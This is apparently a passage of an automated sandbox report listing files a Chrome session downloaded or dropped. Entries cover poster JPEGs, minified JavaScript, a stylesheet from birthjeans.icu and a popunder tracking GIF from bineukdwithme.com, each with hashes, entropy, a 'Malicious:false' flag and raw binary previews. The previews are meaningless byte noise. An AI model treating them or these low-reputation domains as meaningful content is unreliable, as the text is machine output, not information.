                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x450, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):15608
                                                                                                                                                                                          Entropy (8bit):7.951918239618769
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:T5cYQomNfmLmul+3+pDeXU0eXecXtwvkvPYxdWQ2ESDA:dcYd8WpDqKXdXtwvkvPYx/2ESU
                                                                                                                                                                                          MD5:0C1BE6A124C9A43729839D799AF1FE7F
                                                                                                                                                                                          SHA1:69F9C2EFD35F4166A595F072DEBF8475B6365F01
                                                                                                                                                                                          SHA-256:1D15B1D6312B54887C7F055C4FD028E205D580DCC1E1030FC62A440A6460410E
                                                                                                                                                                                          SHA-512:DB27013EACBEC499DCDB239DC6493C3EF696E740003FC5951129B95BC37A6BAE85FCA1C3F5D8E914AC989591270B8B13E5B8BD747A389336ECF16BB762F5BF23
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BZDFlMjEyM2QtMGQ1NS00NWYzLTllMTItZTVmODcxZDY3ZDMzXkEyXkFqcGc@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........4.................................................................).I....RU.g ..Z:.a]...yz}..9.L.WY..<Wn=..%.J.....+..*.d....}.R..N.Y...Z.......(..$..D.O........1.ea..~.4;].:L.....\..JGs....{.1s...2.=2...F...H..d........).....D..!.i.'.i.'...cp.`...'.....*q)N.#...b!..,.D.M...MFD.%.....h.w#..b!..L#..#...x..g.xl^..5..x5.....J&.MIZ....z...7.&..Kx.;...z.;.F.....:...B.8..sE...V ..:...ut../Zn....../.Ess.Fa....._..1K...N.....{.......5h4b.n3..W......oH.._.5.4o...@.7./.O..v.iK9Vl..9n&../..l..Y.+W..l..R..^s^.._...b..D.I'..Y.....al.k.fT...=oIK,.>.[...8..y...>.ij..{.OG..<6...0.Z..2'G5..#....2....I.k...2.....CGf..\...Qi.....b..^.d.)..]*./.VwZ...So...[..~..<....2.._..z.^k.K..l.@i...v.Q...g. 2T.....z4...S....g.".}......;..z.d.....,....^.P."..n..Wz...K./...n..K...,U?........g.jS......n][&....+..?
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:ASCII text, with very long lines (561)
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):30884
                                                                                                                                                                                          Entropy (8bit):5.396878850736056
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:4o63kjilKDknpjTqty5qTWZhuHjiyBMAtmN4C4SYCG3EzZYBFS/+0O/txrncOnk5:Utlrpgy5GZHm4C4N10kv0O/zrYe1M
                                                                                                                                                                                          MD5:32C99FE6533A025BDB08BDE87A9B4F6E
                                                                                                                                                                                          SHA1:F1B48F220F4B4B81CCDBB1A9289B821A66CFA1D3
                                                                                                                                                                                          SHA-256:14939503C8A97BEF459CE94218F0E65933AB569F7B1D726BCB0B3C1031EBCCF9
                                                                                                                                                                                          SHA-512:8D454CC89659899B923B9467FD1F488F0DEA432D4FDAEDB59FAA83C29D4FEDD045AA445BE34D094103E4D81BD4773B61F926C381F14FC7388E34D89D51F4582D
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:(function(){'use strict';var q;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}.var r=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function da(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}.var t=da(this);function u(a,b){if(b)a:{var c=t;a=a.split(".");for(var d=0;d<a.length-1;d++){var g=a[d];if(!(g in c))break a;c=c[g]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&r(c,a,{configurable:!0,writable:!0,value:b})}}.u("Symbol",function(a){function b(k){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(k||"")+"_"+g++,k)}.function c(k,e){this.g=k;r(this,"description",{configurable:!0,writable:!0,value:e
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x467, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):31854
                                                                                                                                                                                          Entropy (8bit):7.98245943473607
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:fPHa8jKys4qQdXG5kuWv6mjdUJ2Pex98VFfeEgEOJeyqX:XmyVOcB3Ffe2O0HX
                                                                                                                                                                                          MD5:854E3DFFA852D210BEFE192E4E8A68AD
                                                                                                                                                                                          SHA1:19F32A013A59E3124557A6DC595062DE14AE0890
                                                                                                                                                                                          SHA-256:270407E2D4E6ACDE9A1269CD2779759F5DD95958FEE6866E5874E2AA3DF15787
                                                                                                                                                                                          SHA-512:E843716F79E12F7C6D632916FAFCE6F10C262694861531D4E4A1816BDE2D864E679587F4B3985901606DBDC9AD358D6EF91D6B6A408D5B89E969BC18B169FD34
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BYjg3YjMyNGYtMWI5YS00ODgyLWIwOWUtODY2NzhmZGIyMzI1XkEyXkFqcGc@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........4...................................................................l......`...z.wwK.p...PqC-h!.....O....$@>..}..K...#..q..N1.%I./.....F..[...C...GN$.kD..... 9. -.=6jW..aE.....z..>x....3.0...`.?@?@..t.....CZPr..%.pS.~M#....(z.^.....i.3.7...t...4....9...............a...%.@...j...RW.!.....N)Q...6G.L..2.$sgd]-......1.P.+~(....T..A.s..AT/<....\a'.."+y.C...2P...4....3t..0...Njj8.0I..f...6.+Wg...^..y....8>....3..../.7....i..B5<.p.Rl....*-...c...;..s...>+4.kdDs!F.d..K..Cb.v1.......).KK#4........p.]Q[.:......#.7.d5.F..)..k...?6..N....,9j.....5\.j....H5...F.jl..f..r..;..(..t.h.'..;.~.ax..x....1^R.iL).2..L...p9L.nH^!.YC..q....|.I...._=j\......r.pK..m.).ZcO+.........|.oo....B.9ECwD.....';C.}..X...V.[.......u.*+(.j/72t...*<.....<.8.....v_..sw\M..o.u*J.i.j;.n{.>k...%.p........
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x451, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):29138
                                                                                                                                                                                          Entropy (8bit):7.974060118937797
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:X5KOBUYHUfZFus5eHR05Zx3mOt44RX+FOFzOyRx2ZCSvbsKbsyVKzeKhgqiDg5Ip:JKOibus0Hu5ZiFuRxmCSDsKyeoAgcvB
                                                                                                                                                                                          MD5:A8929B1915E999DA4F1DF599D45F82E5
                                                                                                                                                                                          SHA1:E81822EBB1FD1ED12A33AF85AF3F69E4B6522C06
                                                                                                                                                                                          SHA-256:0F88B3B92B26A50174F627A12F7E06698D0162F58E8AF6AFAE87752DFB48022A
                                                                                                                                                                                          SHA-512:A0E291FD3EFE4E501F471330F387ACD2052B9083DC4011E6415DD81468C116C54E55D98EC51DF718BADA47176249E0BCA8BAAA09F18ECC8165D0098E01CD528F
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5...................................................................7, .......#.&"V.U0.c.eI.A".......l.6......8.N....(.L.q9Z..k.e0I..tErv6.A.w.TK..*m......4....F....A.A.B@.. (;...+5..yi.-...e.....D........H1X++..3#...6.*".B...O5+k........=?UYT.=T..Yq...F...zE.....q.|.].m=...C1....Z..`...F..%...E&7.!.-.[.y....}..D.[....FRW.V..:....L...F..g.gz.9x..8..d2.7.[..&=.'.7}......B-....c......R*G..Zw....m.9.........O\[...{....].....f.{.0...LJ...5ii8..7.."lV.z.....RF.[...ID..0F.....CY...z......*;r.md]3.S.......M[.f.6.......{+mf.L...:v..N.J....@d...).....Cs..+u%.e..C.u.G4z.....r6E.Bve,.X..G71.5...+..?...f.+.z..uDy.sj..q.v..`A(P ..fY.-.^....v6.:..Y.5E..7..U...H.....n..Y....zY._.k@..w..6m^;[^..9..g'...<..7...=.9.)\6Ys<.mVU....5.`K.k}gh...s.P..B..K...v.......]a.....;f9..uU.i.Hu
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x444, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):37973
                                                                                                                                                                                          Entropy (8bit):7.983740757081899
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:2DTZ2wZOQtNdbWj5DPQswV9Uwocp93oIrnpSuIRFwWzVmsIojyfaYsF:2DdLZR5WZMV9+E9lrnp5IXHzxIBaYsF
                                                                                                                                                                                          MD5:663E3D11350AA6C0619FF525B3DE5660
                                                                                                                                                                                          SHA1:B4D6DD5093265724D765E214A96876DFE5CC513C
                                                                                                                                                                                          SHA-256:C89AB73F403678CB7332EAFA0496229E1E25AA5447704E315299871C7C3B9A1B
                                                                                                                                                                                          SHA-512:8714BF1F8A110021AE74D02DB5443F816A10E1C33372A0C06CF2905B030872E1F085D8456A05ADB6BAF1C5726CC784F93001FDD1047CE420E75AB053F67F1A45
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........6...................................................................XBp.l@..x@...0'..!; .N. ......; .N.(....tAr.....a........)....J..|.F.....eE/.E.5.r.p.M.k.K..y.]!..1b.^....j.5...b..5.....SM.2]B.R..te.nVZ....$q.O(..ny...|..>..+{"...2x.x2D...7.}".t4.Us...k..8..|4.*%u..+.+.5NE.=;.u.(..H.0.#.(.y)m.H..g9."].Q..-......\..=z`..m.S...0..."..j.l...Sm.5.sM.8.:e......0ozm.e.2D.d60Mt..d...y\X.......3....Cc\..H..A.3.r.u.0L.\.Y1....&t.T`.+fq.,..Z......|.../.vx.Wy...@......2...7E.W.....,B9#.&q...9.0....].....I.g..gm6..:..y........lj..W..a1..Il.7T+..+....,.%......)..`..K..j.l.......|e.k...q.m..... `..u$Y....r.....=..[.o..k.7 .M.....z..)..7I+.)...\..".(#o.h...]K..l..,.j|...L..*I;5.H.o/.>=.o.;..S .S....g._...{7..#....2.h..G.X>p.W....3..ez...9lY...Y3.jv...ZO.jI[...7.}e..Y+6[b..ES.:...D..-.
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):88567
                                                                                                                                                                                          Entropy (8bit):4.992940898563259
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:AoiwYoJYioeKbBt/pqy8GA92tkvnAAaQyXi4Ev4dn+7S:xT2tkvAAaQyS4Ev4c7S
                                                                                                                                                                                          MD5:F6A789D6FB238D3EB3B2B76E1CDB5177
                                                                                                                                                                                          SHA1:FECE19D4CCECA5FE965355284C834D5498A40764
                                                                                                                                                                                          SHA-256:C2774266720E24C92A68D6473091AC40BA7D66258632FA240CE3E92315ACE1CC
                                                                                                                                                                                          SHA-512:3C6127340BA0453AA2B76542812A107964445BCA89911A0680E2BB801EC03091E49070D706E635E5DA3C727C719007AAB28325055B5A4E7C4EE8867A478A7CFD
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://birthjeans.icu/templates/assets/s1/style.css
                                                                                                                                                                                          Preview:.@import url("https://fonts.googleapis.com/css2?family=Plus+Jakarta+Sans:ital,wght@0,200;0,300;0,400;0,500;0,600;0,700;0,800;1,200;1,300;1,400;1,500;1,600;1,700;1,800&display=swap");.:root, [data-bs-theme=light] {. --bs-body-font-family: "Plus Jakarta Sans", sans-serif;. --bs-body-font-size: 16px;. --bs-body-font-weight: 400;. --bs-body-line-height: 1.5;. --bs-body-color: #656565;. --bs-body-color-rgb: 114,114,114;. --bs-primary: #0033FF;. --bs-secondary: #FA1D63;. --bs-light: #E4EBFE;. --bs-dark: #000000;. --bs-primary-rgb: 0,51,255;. --bs-secondary-rgb: 250,29,99;. --bs-light-rgb: 228,235,254;. --bs-dark-rgb: 0,0,0;. --bs-link-color: #0d6efd;. --bs-link-color-rgb: 13,110,253;. --bs-link-decoration: underline;. --bs-link-hover-color: #0a58ca;. --bs-link-hover-color-rgb: 10,88,202;. --bs-code-color: #d63384;. --bs-highlight-bg: #fff3cd;. --bs-border-color: #D8D8D8;. --bs-border-color-translucent: rgba(255, 255, 255, 0.1);. --bs-border-radius: 8px;. --bs-border-
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x458, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):42069
                                                                                                                                                                                          Entropy (8bit):7.9874490310628445
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:B6CbIsh2olYOk3JihVC7VX7fEdQY5OES26QNSZsKHiJS7m8/yUuhYIdDa1Y:Zsc2B3oQVrMdQY5OEP6QNIsYiYmzXJau
                                                                                                                                                                                          MD5:2F0B8E65FD117081E5BB680F649143C4
                                                                                                                                                                                          SHA1:6A08921B5B6FDE09B54FE02374080260FC204F2D
                                                                                                                                                                                          SHA-256:691D462518715C511D508866F6509F280BAB2A9F644081129E946890BC4D82BD
                                                                                                                                                                                          SHA-512:6ECFB7FE34C25A162757EAF8C8C7827159F6DB171DEFE6ADB4C8BC64C03138B96A67BB2DCE34520B9C72D6C0DE1EEBCF3983D166458439FFD5DA3588B388C0DB
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........6.....................................................................<F.......V...6+.H..JN.2.U>......X$......xU.Xo+........s......p..s.m1..F...$.h.X<.BC...=7. ..XI...q......K.Z>}../....[..........tG.reQ#............tL....\...n](....B...l..s(c...RK{].T..#.dJ..a......%2Np.....V..a.r.6...S.....\.....H%.........V,.QV.I..,gT.L.B..T.wv...9p.e..V-.....b.t".......<.....d..A...._'..6.....Y^...x=s...$?.'?_\/%......./.........(.@.t.9.......u56.p.iX:^......#..x.O1..WN\.4...E.5@...'...V....Q..}..[.;\...>o.|...$..IB.I.U.3........W <h.....].[=5.[..\.....+..Vy.i..:..ADo...`....e7z>.g..]*..>%..".>mWO...q!.eC.3J.E....+..D?.6/.r..9.x|...KBv......vA..l.:..e..U...G........t1......U....].J.,~..?H.....*|F..'..a......>...O.u.5.6.....^."#G&.j.....1V.J..z...!....y.).....[d..x.6...G5<....",...J3
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x425, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):32570
                                                                                                                                                                                          Entropy (8bit):7.975042349559844
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:88iZOiOZEgu7KIbvgMfLDz5AIXdorTbdqcUS:nAYY7YMfPAdz
                                                                                                                                                                                          MD5:F38ED4676CA675664B7A955DA6008EF5
                                                                                                                                                                                          SHA1:CE97F61BC21882CF4C5E3BF10C6A5764760EFCB2
                                                                                                                                                                                          SHA-256:3ADA43F00FF99C1F8927421ADEF6C2DDF7DF0BFF58AEED561E04D08D65C55454
                                                                                                                                                                                          SHA-512:D008A457101EA6ABF79AC0175806C515F1E61EC4C6EA6491B98377C68F71F33F730C5010046450427D28A04B6782470CEC35CF6134AD2EBDE328BA56CBAF49B5
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BMjIxOTIyNjE4OF5BMl5BanBnXkFtZTgwMDc5NTY2MDE@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5.................................................................(.i....Z...x.f..K=P....0U+w.HD~...6.}a.../e.N..hF.H.M..#.......s..z.Y...,.C!...>N....2.....7O8.K.z~D...~K...M.Z.@}.....M..d...y....0....<.k..-5../.+gg.(z...U....P1..i...#c.4...=..t.....}=....+.<..f...!y.C.A.rI..#..O& >Eb.Z...L.....'7....b..T.+[>..A%....<.4.......S...F..7...M.v..........k..D.zM/..V...-.=......+..r..'p..v.-...qm.E.4..j.. ...$....MR:....<...?....t...*..g.M..V.c.}.`.c)q.0.|.a....r ..e.1.d...i.....p..}.:.h.*.....F&-.....M ...]]INf.*.*/......!<..y^.......y....B..8..N.M.N.$C..<t&.^.l..3j.Hm.s....]..iE]u.8uoe......-...4.[HU.A.?Z.,<.|..1..I...;...>..3D..{.....F.oG..Wav%o....F...x.X..y9..(..........}.dZ.R...Y.}C.M..8.a.&...2.5.....*...,F1v3{5|.r=..untR......_hrE..u e.^~.....Zzo.zN.a..~.n{.....
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x445, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):44013
                                                                                                                                                                                          Entropy (8bit):7.977229529570302
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:WYIbqAegDB8H1KAMxLT1N56Yu0Dwe19LboxvNTM86nN5555ADuqka3l:WYaQgInoRfDwo8xvlM8c5mxl
                                                                                                                                                                                          MD5:9CE0226FE84AA5AF6DBD2CE66A02EBE3
                                                                                                                                                                                          SHA1:0D4CFA60AB44E4720CBE9B08EE934FE95C343EBB
                                                                                                                                                                                          SHA-256:8817018D6E04B673D45C52E52D9F29FB8959AED14DC16B932C60D35EFDDD3923
                                                                                                                                                                                          SHA-512:04E210A93E8E64915E569D0A91C8BBA1B7E82FB22664A4DB2E8E7B47FA9A7138580BA26934E72B44D8080388EFF8FE09E96DE45F8793BDBD2CE0D090D5B30F33
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5....................................................................hy......Z....p.\.2;.4)..U..6.H....:.VVO.5......E..r>...ZX....}..X......xEk\.W+.f.d.>..1...._*..F.&...CH.....Y*F..t.{.+t..DS..z5+.t.f...^>.c\....et....*..G..}RV......!^.Z;gzd..u.@.!f.....6AJ..;U.f...2......z%......v..+."...HLE..FJ..v.r`g..a..>...hU.-.<S._.4...R]......m...e....kG._.;}~.H_p.X~!P...%i...d;.E.n./..=..&.~.7...~.8|.bY..u..6.S.....|@B^.[.kX..i...@.5....{!....6..L...e...b..:..3.R%K@.N$..g$.v...ew. ..&m../...../lP...m...@.vS.1..KZ.8.v..0!..u....jB.j5d..E|.BXB.Q........|.z.I....}..1^J..j..'..p.~..v.....'k.t<...j....O...[...H.M...V.;+.........IUB.=V.K..3.KXl8..TT.o...&M......^.Du.w.+.W.........S..#...L...Tj].>...-$..kW-x.i...C......W..*........Z..>b...9IJ4%.i.......`T.gv.?...-]{....Ymh..By.T.....S.vF.k
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):35
                                                                                                                                                                                          Entropy (8bit):2.9889227488523016
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:CUdrllHh/:HJ/
                                                                                                                                                                                          MD5:28D6814F309EA289F847C69CF91194C6
                                                                                                                                                                                          SHA1:0F4E929DD5BB2564F7AB9C76338E04E292A42ACE
                                                                                                                                                                                          SHA-256:8337212354871836E6763A41E615916C89BAC5B3F1F0ADF60BA43C7C806E1015
                                                                                                                                                                                          SHA-512:1D68B92E8D822FE82DC7563EDD7B37F3418A02A89F1A9F0454CCA664C2FC2565235E0D85540FF9BE0B20175BE3F5B7B4EAE1175067465D5CCA13486AAB4C582C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://bineukdwithme.com/popunder.gif
                                                                                                                                                                                          Preview:GIF89a.............,...........D..;
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:PNG image data, 200 x 200, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):4334
                                                                                                                                                                                          Entropy (8bit):7.869787696459556
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:6m01MWIhj9aPKlPaL2mTHRqeln5s5j1utTn00v1tbxT3No:A1M7AK5aL2AB7sAI07d6
                                                                                                                                                                                          MD5:1F8D7A0F7D13BC20E76A00901400D071
                                                                                                                                                                                          SHA1:776B04C32352BFA34FD764A8975B16018E10348B
                                                                                                                                                                                          SHA-256:C4BA91AC2DB080CDDFCFC39EF8A900927093500558EC85F9EA6A6031C7BCD314
                                                                                                                                                                                          SHA-512:4893F8D7E2973E3FE7E513B981D9A35ECFD5E49C550EF170404E201BA39E05B4A7FECCF7B71E89E5950E36219DDDB8EDB443B2A3E355802E1DA1F8AF38526013
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:.PNG........IHDR..............X......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[l....G....jA/.R......*P.P..-q..+.ei.bA..P.^....E2U..W...EiB...p1D..B.R*B..)E.M...G.N......g...z..I.vw.e....9s...B.!..B.!..B.!..B.!..B.!..B.!..B.!..88R....#..IMs..eQ..!...I..~...M.l.ha9.>_....X.Hy.&.....M..Q.?r.7h..Y.H0..x.&q.c...4.t...a;..&.2G+..B...x.&.9HW.@_.$4..j..&.9...|.IjDs.....k....%....^.S....Q...r..Y.J^n..1.OH4.....]..F...f..o..8]#.cOB"A..s.N7..u#fu.R....w.lM..AH5.`.:...:....0"..:....mU#c...r-..).AH$......u./.B.p....5.........B"..E..oL.3..K..H.`.A....E..!$...-....;X.h.B..`.A....E..!$...-....;X.h.B..`.A....E..!$...-....;X.h.B..`.A....E..!$...-....;X.h.B..`.A....E..!$...-....;X.h.B..`.A....E..!$...-....;X.h.B..`.A....E..!$.....5....7e//.B".....fNy=X..W . $.;X..^D^.p...p-+.B"q.LEEo:.....%oL......B"q.L...!.....$c....E..H\...Z.`.....[ze|...P..Jn.,.'o....E..H. ..5.EoJ.... c.i?>g$M.P.X........j.5........*.......a.}VZE..NF.".v=.D..)...BjA...+x:]..wxC
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x421, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):22176
                                                                                                                                                                                          Entropy (8bit):7.97285190313166
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:BBDCVVsWLx9CPrvoV/QHI1WdqfVkoLgZqfOBg9BCCu+5Ag/nRy:BtCVS2SEKHI1QqbL3fC8CCu+5Agc
                                                                                                                                                                                          MD5:F300845C32B49D010D57DA04E466990A
                                                                                                                                                                                          SHA1:1EFDB03BD7125AE8D64853E064E773CC9EB55BFF
                                                                                                                                                                                          SHA-256:6C17742945718258DC26BC993826217906D9413703214B7BED9EF39D31AC77E1
                                                                                                                                                                                          SHA-512:C841622C37395865D60FDD8AA4E344D0A87875A4E1C27E8E83510C24567DC28EFA67E55AB8B3184562E296DEB1435402F2EBDE39D88D8D84B4CA5E20CEC8CCB8
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5..................................................................k..f2c0%....2..Y.%.g.4...n.~...Oo[.|...;.y."b......*.k."....../4.......bID...<.......^.8%..i..2.wHu.u"..M.5z.;...Y.h.<.._......E.p....b.I.FZ'...T...u.W...|..m..g...@qG.....l..%..?.....u;..M....Xyu.....5KUI...LA.1v.7.".<...,L.TTQ^.$y..GJX..4z.0....,......0........V.`..Y.[..%.sb.gS....-cYC6._.5.3.L..k....Qma.J.W.X.B..`uB=..Znc..........M.o.+h..a5...a...lu...Kg...$....B.s..?4..b.."..=.J.v.e..o.Nhy.-).V...:..?.8.=oj.t......'...9>..NM...e..pa..u..W............k.S.)k..$.e.7.S:.gh...p...H..|.\.....,..%z.. .rk.k..g..k.5mN^$v.Y...-.1#.)..}2M.+G..;.._..co.|.8.}..6f..J...C..H;........vibq..F.cR....IDdE.....[..j.-.f.:NSS.5.....y.%Y.\2..lH....sxE*.l+....WH...o..W.......Mr^..J*.X.W6...:M.%..#fd.a--...z...b..=...[.U.Ri..p.&%....
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x458, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):50726
                                                                                                                                                                                          Entropy (8bit):7.988400909546364
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:hpRsC1FmR2Eux6vxzEniFkP5OT9X2kRXRz:hd4rJvKniFWOZX2SRz
                                                                                                                                                                                          MD5:22A151DAC63249FF0CA2133D0C1695E0
                                                                                                                                                                                          SHA1:C7E0871DF197C06433C1A12021E50C59EBF17907
                                                                                                                                                                                          SHA-256:45C5E5BC9EA043DC00084221A06DE85EF7739D53899C584763B1916746782ECA
                                                                                                                                                                                          SHA-512:176909A5BDBDF55EFC1705BECCC970CB8E7A6C070DE828B1D04EBC8856C23EE8CBD2E7F0220DBB358101E46108643365C5A0A5DE46007A9DC79890E1E1932610
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........6..................................................................j.ci...*..I i.b...<#.#....i..G%Io.Ul.i.C..l.?.l2.w.P..[...`)...'_..[.:....3...".p.......D....\...NR..4...4.r.9.....`...#8..s/.T4..U.....H..(..B_t..6NP\G<2R...+....T..n.q...Q.<....[2.>....@.e.v.n...+.d.8z..W`c&..{.........+.Q.....>|2..aX....*m&...P..-e...x}q.D..W.$..(.No...T./..8Q.n...F.5..x.g......>6...(qo.9.?C.V...(....}...x._ba.s....<.rx..}:."|.......Rr.on.G|....F_@...kvN...Ml.....OQ...KX.q. .[/......my....s.|..~........p'......-.C.7...N.j.C?.Y....2..x.7S...........P4_Q.....2.w..7.1U&.J..G..Uw.<...9Ur....Tm...}.k{..wc..wt'Er.LX.*.p...>....{a...BX.m.r...akdt..y.Y.g)H=..YV....A.U......AE{.n..T.W..../A.G..`.._...!B>..<.;y.)*W./.!.... .....c.K.;DB..<m......wpzn6..?C..x..B.....j.......t..3...Y...`Pa
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x429, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):27970
                                                                                                                                                                                          Entropy (8bit):7.971075242373812
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:7WZAFZob9G9mCW/YXXxb4JpAwb9gks77zDOn:7akWFC2Ynx2GwbSkuzDi
                                                                                                                                                                                          MD5:58FE422A74818F31163A7EB5D3C60C4A
                                                                                                                                                                                          SHA1:9096CDDB107A8C1D01A0E65CC144578EB1E04182
